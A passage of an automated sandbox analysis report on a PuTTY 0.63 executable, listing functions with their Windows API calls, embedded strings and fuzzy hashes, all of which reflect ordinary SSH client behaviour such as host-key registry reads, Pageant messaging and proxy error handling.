                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\SshHostKeys,00412E1F), ref: 00449BC7
                            • RegQueryValueExA.ADVAPI32(00412E1F,00000000,00000000,?,00000000,?,?,?,00000001,00000000,?,0041D9AD,?,?,?,?), ref: 00449C05
                            • _strcspn.LIBCMT ref: 00449C3A
                            • RegQueryValueExA.ADVAPI32(00412E1F,?,00000000,?,00000000,?,?,?,?,?,?,?,00000001,00000000,?,0041D9AD), ref: 00449C6B
                            • _strcspn.LIBCMT ref: 00449C9D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$QueryValue_strcspn$Open_strcat
                            • String ID: Software\SimonTatham\PuTTY\SshHostKeys$rsa
                            • API String ID: 4233637586-372324377
                            • Opcode ID: f0adde865e3e6c4d5a6e0b5175e43f2cf585c726d58047edd740d1f801791864
                            • Instruction ID: d164950eb8cc890663b1bf0894168e3683092587b7d8082d924025db078e2c12
                            • Opcode Fuzzy Hash: f0adde865e3e6c4d5a6e0b5175e43f2cf585c726d58047edd740d1f801791864
                            • Instruction Fuzzy Hash: E461B271D04209AFEF159FA5DC81BAFBBB9EF04314F10046BF901A6292E7799E40DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C35C Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 189windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 0043C3D0
                            • SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 0043C3FB
                            • MessageBeep.USER32(00000000), ref: 0043C409
                            • _strlen.LIBCMT ref: 0043C42A
                            • _strlen.LIBCMT ref: 0043C46E
                            • SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 0043C4DB
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C50F
                            • SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00000000), ref: 0043C538
                            • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 0043C557
                            • GetParent.USER32(?), ref: 0043C571
                            • SetActiveWindow.USER32(00000000), ref: 0043C578
                            • DestroyWindow.USER32(?), ref: 0043C581
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
                            • String ID: %s Event Log
                            • API String ID: 2560716093-583241876
                            • Opcode ID: 45d19d10145400aff0c1653e71e78a4a6cf5eb5c36c6f43b04fa895eefa17954
                            • Instruction ID: 2e356330c53dc0c758c5851041f359bc7b0b19ff5107ced1d053ec69806b6889
                            • Opcode Fuzzy Hash: 45d19d10145400aff0c1653e71e78a4a6cf5eb5c36c6f43b04fa895eefa17954
                            • Instruction Fuzzy Hash: 6851D475500314BFDB109F65DCC5EAE3B69FB08358F10543AFA05AB2A2DB78D941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F273 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 164COMMON
                            Download Yara Rule
                            APIs
                            • CreatePen.GDI32(00000000,00000000), ref: 0043F355
                            • SelectObject.GDI32(?,00000000), ref: 0043F365
                            • Polyline.GDI32(?,?,00000005), ref: 0043F372
                            • SelectObject.GDI32(?,00000000), ref: 0043F37C
                            • DeleteObject.GDI32(00000000), ref: 0043F37F
                            • CreatePen.GDI32(00000000,00000000), ref: 0043F3E8
                            • SelectObject.GDI32(00000001,00000000), ref: 0043F3F8
                            • MoveToEx.GDI32(00000001,00000000,00000003,00000000), ref: 0043F406
                            • LineTo.GDI32(00000001,00000001,00000003), ref: 0043F420
                            • SelectObject.GDI32(00000001,?), ref: 0043F42C
                            • SetPixel.GDI32(00000001,00000000,00000003), ref: 0043F450
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                            • String ID: @$@
                            • API String ID: 1020918164-149943524
                            • Opcode ID: db983c29a3bff71a569ec5bd1fb67aea2ad07354bab0f0ad1b00daaa9047c993
                            • Instruction ID: 158a60834a37111c831db5e4307e9cd77ef9cd87de50dbf7fef5036c2c768d41
                            • Opcode Fuzzy Hash: db983c29a3bff71a569ec5bd1fb67aea2ad07354bab0f0ad1b00daaa9047c993
                            • Instruction Fuzzy Hash: 86615A71800249EFDF11CF58DC44AAEBBB5FF48304F15807AF908A62A1D3798A64DF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448A36 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 153filememorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowA.USER32(Pageant,Pageant), ref: 00448A56
                            • GetCurrentThreadId.KERNEL32 ref: 00448A69
                            • LocalAlloc.KERNEL32(00000040,00000014,?,00000004,?,?), ref: 00448AA2
                            • LocalFree.KERNEL32(00000000,?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00448AE4
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002000,?), ref: 00448AFB
                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,00000004,?,?), ref: 00448B1B
                            • _strlen.LIBCMT ref: 00448B3A
                            • SendMessageA.USER32(?,0000004A,00000000,?), ref: 00448B53
                            • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BA3
                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BAC
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 004488A1
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004488BF
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 004488E5
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 0044890B
                              • Part of subcall function 00448879: GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00448931
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000004,?,00000004,?,?), ref: 00448BC3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$FileLocal$FreeView$AllocCloseCreateCurrentFindHandleMappingMessageSendThreadUnmapWindow_strlen
                            • String ID: Pageant$PageantRequest%08x
                            • API String ID: 208608764-270379698
                            • Opcode ID: 2ba39d7b3bcf770192401992b35e7b70c7b38d429dd409b5b6948dd89857b78b
                            • Instruction ID: ebb8a2e89abeaa8aa0223dd1f5b74b345cb8dcb75db0a578d36e95a9be23e8d5
                            • Opcode Fuzzy Hash: 2ba39d7b3bcf770192401992b35e7b70c7b38d429dd409b5b6948dd89857b78b
                            • Instruction Fuzzy Hash: 9651B0B0904205AFEB109FA6DC85DAFBBB8FF44305F14406FF511E22A1DB789940CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00445B09 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 121libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat$_strrchr$AddressFileFreeLibraryModuleNameProc
                            • String ID: HtmlHelpA$hhctrl.ocx$putty.chm$putty.cnt$putty.hlp
                            • API String ID: 2909541172-2623836457
                            • Opcode ID: 3c97a9e0351280e2cf192f01bb02c5771d26d1062c0a1de6b1a99868926aaff9
                            • Instruction ID: 922ac8fd8dce154ffb209a198d0b63c5704e289720c1fd91b1d3e43fff633d38
                            • Opcode Fuzzy Hash: 3c97a9e0351280e2cf192f01bb02c5771d26d1062c0a1de6b1a99868926aaff9
                            • Instruction Fuzzy Hash: A131D3319047505BFB207FA16CCAAAA3399FB04315F58047FF648E3143EA7C69498B9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00454A54 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 97COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                            • API String ID: 3058806289-1673886896
                            • Opcode ID: d2cd47f40433d7fe36d0b6ad18a21b0ab4467e2c9e4f75772f10d7653d290a91
                            • Instruction ID: 8d1c553ab4dd858755cf9880b1e283b05601171f676434bbb1ead8f1a1024395
                            • Opcode Fuzzy Hash: d2cd47f40433d7fe36d0b6ad18a21b0ab4467e2c9e4f75772f10d7653d290a91
                            • Instruction Fuzzy Hash: E5310C71E412147BE711ABA19C42FCE7668AF04318F10446FF915AB183DB7CDE49475E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044F92A Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(user32.dll,0046FC80,?,?,00000000,00470490,00000008,004549CE), ref: 0044F942
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0044F95E
                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0044F96F
                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0044F97C
                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0044F992
                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0044F9A3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                            • API String ID: 2238633743-752805172
                            • Opcode ID: ced9f3315be097a811ab3a554fe62e3ae77f8b5b011789cfd708af97ac7f9746
                            • Instruction ID: 21405082d27aaec33bee693cef50ad4e3cae07fc1aa7d4a10cea6c2141e218df
                            • Opcode Fuzzy Hash: ced9f3315be097a811ab3a554fe62e3ae77f8b5b011789cfd708af97ac7f9746
                            • Instruction Fuzzy Hash: 3B21B671604345AEFB118F749D85B673BA8EB44744B80403BE909D2390EB78D848DB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C5EF Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteA.SHELL32(?,open,http://www.chiark.greenend.org.uk/~sgtatham/putty/,00000000,00000000,0000000A), ref: 0043C64B
                            • EnableWindow.USER32(?,00000000), ref: 0043C663
                            • DialogBoxParamA.USER32(00000071,?,Function_0003C590,00000000), ref: 0043C675
                            • EnableWindow.USER32(?,00000001), ref: 0043C67E
                            • SetActiveWindow.USER32(?), ref: 0043C681
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C6A2
                            • SetDlgItemTextA.USER32(?,000003EA), ref: 0043C6C3
                            • SetDlgItemTextA.USER32(?,000003EB,Release 0.63), ref: 0043C6D2
                            • EndDialog.USER32(?,00000001), ref: 0043C6DE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Text$DialogEnableItem$ActiveExecuteParamShell
                            • String ID: About %s$Release 0.63$http://www.chiark.greenend.org.uk/~sgtatham/putty/$open
                            • API String ID: 469075849-3246762659
                            • Opcode ID: 9a79417d7be96c7cc9ec3b14a7e3cfcdf33241f5422cb80a7be18f0e89d32167
                            • Instruction ID: 336dbcc97489b208e7a7e42fefce6eb53bce1fd9d8b0f9d9a045658a04007ca6
                            • Opcode Fuzzy Hash: 9a79417d7be96c7cc9ec3b14a7e3cfcdf33241f5422cb80a7be18f0e89d32167
                            • Instruction Fuzzy Hash: 7721D431144204B7DB221F64EC8AFAE3E24EB19B52F105037F505F90F1D7A89981DB8D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043956B Relevance: 22.7, APIs: 15, Instructions: 163windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ObjectSelect$CapsDeviceDialogExtentMessageModePointRectReleaseSendText_strcat_strncpy
                            • String ID:
                            • API String ID: 3302912960-0
                            • Opcode ID: 28901d0a8ecffb8d2495b3fbed707c1470b540995435a800e5232994a5356064
                            • Instruction ID: 262e785b3b08c70c4629ce7070e32358f2250a536410bbd531516cb5c9e3fa95
                            • Opcode Fuzzy Hash: 28901d0a8ecffb8d2495b3fbed707c1470b540995435a800e5232994a5356064
                            • Instruction Fuzzy Hash: C751B271805209FFDF009F95EC869BEBBB9FF08315F20006BF911A6291DBB99D419B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E142 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 251COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1.99$2.0$?A$S$SSH protocol version 1 required by user but not provided by server$SSH protocol version 2 required by user but not provided by server$SSH-$Server version: %s$Using SSH protocol version %d
                            • API String ID: 0-2439925355
                            • Opcode ID: 8ca3135db0e9186eebccfd4cac00502ca2a52af96ea4bb2dae740041ee24bb59
                            • Instruction ID: 6e3529e77a367a1f60e5496eeb96435607e447254fb75afe2229aad41306a309
                            • Opcode Fuzzy Hash: 8ca3135db0e9186eebccfd4cac00502ca2a52af96ea4bb2dae740041ee24bb59
                            • Instruction Fuzzy Hash: 6A9135B4500745EBDB20DF26C809AEB7BA4EF05308F10456FFD5996292DB7C9980CB9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040CB57 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • Proxy error: SOCKS server wanted IDENTD on client, xrefs: 0040CD3C
                            • Z, xrefs: 0040CD11
                            • Proxy error: unexpected proxy error, xrefs: 0040CD5C
                            • Proxy error: SOCKS proxy responded with unexpected reply code version, xrefs: 0040CD0A
                            • ..\proxy.c, xrefs: 0040CBAD
                            • type == ADDRTYPE_NAME, xrefs: 0040CBB2
                            • Proxy error: Error while communicating with proxy, xrefs: 0040CD2E
                            • Proxy error: Username and IDENTD on client don't agree, xrefs: 0040CD35
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: ..\proxy.c$Proxy error: Error while communicating with proxy$Proxy error: SOCKS proxy responded with unexpected reply code version$Proxy error: SOCKS server wanted IDENTD on client$Proxy error: Username and IDENTD on client don't agree$Proxy error: unexpected proxy error$Z$type == ADDRTYPE_NAME
                            • API String ID: 1497175149-2896027840
                            • Opcode ID: 777a6fa7652b0ae83293e53c6fa6c80eea3c8fe514b0efca323d479fb51e11ed
                            • Instruction ID: 77dbb117b44a6dc2fdf4981727dedc23c7aa012fec282d37bea82a92d5816999
                            • Opcode Fuzzy Hash: 777a6fa7652b0ae83293e53c6fa6c80eea3c8fe514b0efca323d479fb51e11ed
                            • Instruction Fuzzy Hash: 99512671900304FFDB209BA0CCC1E6A7BA8AF05304F104A7BF555A62C2D77CE945879A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044B884 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 162COMMON
                            Download Yara Rule
                            Strings
                            • MIT-MAGIC-COOKIE-1 data was wrong length, xrefs: 0044B8BB
                            • MIT-MAGIC-COOKIE-1 data did not match, xrefs: 0044B8D6
                            • XDM-AUTHORIZATION-1 data was wrong length, xrefs: 0044B8EF
                            • ..\x11fwd.c, xrefs: 0044B9DB, 0044BA21
                            • wrong authorisation protocol attempted, xrefs: 0044B8A6
                            • cannot do XDM-AUTHORIZATION-1 without remote address data, xrefs: 0044B8FF
                            • disp->xdmseen != NULL, xrefs: 0044B9E0
                            • XDM-AUTHORIZATION-1 data replayed, xrefs: 0044BA03
                            • XDM-AUTHORIZATION-1 time stamp was too far out, xrefs: 0044B99E
                            • XDM-AUTHORIZATION-1 data failed check, xrefs: 0044B9A8
                            • seen != NULL, xrefs: 0044BA26
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: ..\x11fwd.c$MIT-MAGIC-COOKIE-1 data did not match$MIT-MAGIC-COOKIE-1 data was wrong length$XDM-AUTHORIZATION-1 data failed check$XDM-AUTHORIZATION-1 data replayed$XDM-AUTHORIZATION-1 data was wrong length$XDM-AUTHORIZATION-1 time stamp was too far out$cannot do XDM-AUTHORIZATION-1 without remote address data$disp->xdmseen != NULL$seen != NULL$wrong authorisation protocol attempted
                            • API String ID: 0-1152134572
                            • Opcode ID: af91739d094f9df1fd860f564365c0b1f275028a5c10926c7a140f5f21a7b185
                            • Instruction ID: 6f468527017b88a32592194186e5bfd36f46cb058d9c585d95c6141b7c0fee88
                            • Opcode Fuzzy Hash: af91739d094f9df1fd860f564365c0b1f275028a5c10926c7a140f5f21a7b185
                            • Instruction Fuzzy Hash: B1514871604650AEFB346A799C42B273BD4EB04314F24843FF69AD6682E76CE90483DE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043A0E4 Relevance: 19.7, APIs: 13, Instructions: 207windowCOMMON
                            Download Yara Rule
                            APIs
                            • #15.COMCTL32(?,?,000000FF), ref: 0043A134
                            • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 0043A148
                            • #15.COMCTL32(?,?,000000FF), ref: 0043A18B
                            • SendDlgItemMessageA.USER32(?,?,00000182,?,00000000), ref: 0043A19F
                            • #15.COMCTL32(?,?,?), ref: 0043A20B
                            • SetWindowLongA.USER32(00000000,00000000,00000001), ref: 0043A220
                            • SendDlgItemMessageA.USER32(?,?,00000180,00000000,00457667), ref: 0043A23A
                            • #14.COMCTL32(?,?,?,00000001,?,00000180,00000000,00457667), ref: 0043A24E
                            • SetWindowLongA.USER32(?,00000000,00000001), ref: 0043A262
                            • SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 0043A2A4
                            • MessageBeep.USER32(00000000), ref: 0043A2AF
                            • SendDlgItemMessageA.USER32(?,?,0000018B,00000000,00000000), ref: 0043A2C2
                            • SendDlgItemMessageA.USER32(?,?,00000199,00000000,00000000), ref: 0043A314
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$ItemSend$LongWindow$Beep
                            • String ID:
                            • API String ID: 2915373918-0
                            • Opcode ID: e157a1aab09075507fc921cba1e737102990613782da314b516460ca38caf700
                            • Instruction ID: 0a6de024250292aeba328e66abb63c7a5e35da013ff5db74abcf94e83080761e
                            • Opcode Fuzzy Hash: e157a1aab09075507fc921cba1e737102990613782da314b516460ca38caf700
                            • Instruction Fuzzy Hash: 19719C7004420AEFCF218F54DD459ABBBB6FF08344F10552AF991922A1C736EDB1DB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00447D7A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 287COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
